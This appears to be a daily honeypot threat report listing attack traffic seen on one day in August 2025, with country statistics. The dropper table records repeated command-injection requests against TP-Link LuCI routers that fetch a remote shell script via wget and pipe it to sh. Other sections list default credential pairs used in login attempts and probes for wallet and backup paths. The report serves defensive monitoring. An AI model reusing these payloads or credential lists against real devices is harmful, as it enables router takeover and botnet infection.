Skip to main content
  1. Daily-Posts/

Report: 2025-08-29

·440 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-08-29
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 13 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 37 new requests that have never been observed before (these were added to the monitored request database.).

A total of 577 requests were recorded during the day, originating from 13 different countries, with a peak of 229 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
FRGermany

botnet_dropper_behaviour
#

remote_addrrequest
121.155.192.188GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1
177.69.131.214GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
99.232.224.106GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
79.87.146.24GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
176.206.226.104GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
221.159.119.6GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
220.87.141.80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
157.107.226.41GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
121.167.125.180GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
98.151.209.12GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
222.112.119.3GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
58.40.8.206GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
220.81.150.55GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//95.103.172.144/router.tplink.sh%20-O-%7Csh) HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
511CONNECT 196.251.67.42:80 HTTP/1.0
86CONNECT 45.221.64.243:80 HTTP/1.0
105CONNECT 196.251.86.195:80 HTTP/1.0
941\x04\x01\x00P\xC4\xFBC*root:root123\x00
951\x04\x01\x00P\xC4\xFBC*ftpuser:ftpuser\x00
961\x04\x01\x00P\xC4\xFBC*leo:DVdmEU8usfIYEiYD9txyX\x00
971\x04\x01\x00P\xC4\xFBC*\x00
981\x04\x01\x00P\xC4\xFBV\xC3fwupgrade:DVdmEU8usfIYEiYD9txyX\x00
991\x04\x01\x00P\xC4\xFBV\xC3test:test\x00
1181GET /logged.jsp HTTP/1.1
1191\x04\x01\x00P\xC4\xFBC*admin:admin\x00
1211\x04\x01\x00P\xC4\xFBV\xC3root:toor\x00
1221\x04\x01\x00P\xC4\xFBC*root:P@ssw0rd\x00
1231\x04\x01\x00P\xC4\xFBC*root:P4ssw0rd\x00
1241\x04\x01\x00P\xC4\xFBC*user1:user1\x00
1251\x04\x01\x00P\xC4\xFBC*logout:logout\x00
1261\x04\x01\x00P\xC4\xFBC*support:support\x00
1271\x04\x01\x00P\xC4\xFBC*pi:raspberry\x00
1281\x04\x01\x00P-\xDD@\xF3ubnt:ubnt\x00
1861GET /wallets/ HTTP/1.1
1871GET /bkp/ HTTP/1.1
1881GET /sql/ HTTP/1.1
1891GET /pay/ HTTP/1.1
1901GET /9547616831 HTTP/1.1
1911GET /3/ HTTP/1.1
1921GET /2/ HTTP/1.1
1931GET /1/ HTTP/1.1
2001GET /send/ HTTP/1.1
2011\x04\x01\x00P\xC4\xFBV\xC3\x00
2141\x04\x01\x00P\xC4\xFBV\xC3service:service\x00
2151\x04\x01\x00P-\xDD@\xF3\x00
2631\x04\x01\x00P-\xDD@\xF3user1:user1\x00
2841GET /solana/ HTTP/1.1
2851GET /dumps/ HTTP/1.1
2861GET /log/ HTTP/1.1
2871GET /coin/ HTTP/1.1
2891GET /tron/ HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0229GB
182US
243DE
338GH
434SC
534HK
619ZA
717FR
815NL
912KR
1010CA
116TR
125BG
134AE
144NO
153CN
163JP
173BR
183RO
192MC
202PL
212IR
221ES
231SG
241IN
251IT
261AZ
271BE
281SE

Related

Report: 2025-08-28
·329 words
Repport Daily
Report: 2025-08-27
·336 words
Repport Daily
Report: 2025-08-26
·353 words
Repport Daily